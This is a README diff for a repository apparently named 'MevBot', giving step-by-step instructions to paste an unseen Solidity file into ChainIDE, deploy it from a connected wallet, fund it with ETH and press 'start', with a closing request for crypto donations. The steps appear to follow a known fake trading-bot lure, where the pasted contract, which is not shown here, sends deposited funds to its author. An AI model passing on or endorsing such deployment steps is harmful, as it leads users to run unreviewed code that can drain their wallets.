sipaht78/MevBot_Lrn/README.md

 With the login button Select "Injected Web 3" and connect your Metamask or wallet with ChainIDE

 On the left create a New File.
-Rename it as you like, i.e: “bot.sol"
+Rename it as you like, i.e: “MevBot.sol"

-Paste the code from bot.sol into the file

-Move to the "Solidity Compiler" tab on the right side, select version "0.6.6" and then "Compile" it

-Move to the "Deploy" tab right under the compiler tab.
-Enter 'ETH' on the Token Name field and your deployer wallet as withdrawal wallet into the second field and then "Deploy" it.
-After the transaction is confirmed, it's your own BOT now

-Find your newly created contract address with the transaction Link.
-Copy the address and send some ETH to your exact contract/bot address

-After your transaction was confirmed, Start the bot by clicking the “start” button.
-Withdraw anytime by clicking the “withdrawal” button

-Do you feel the urge to send me some crypto?

 # Mev-Bot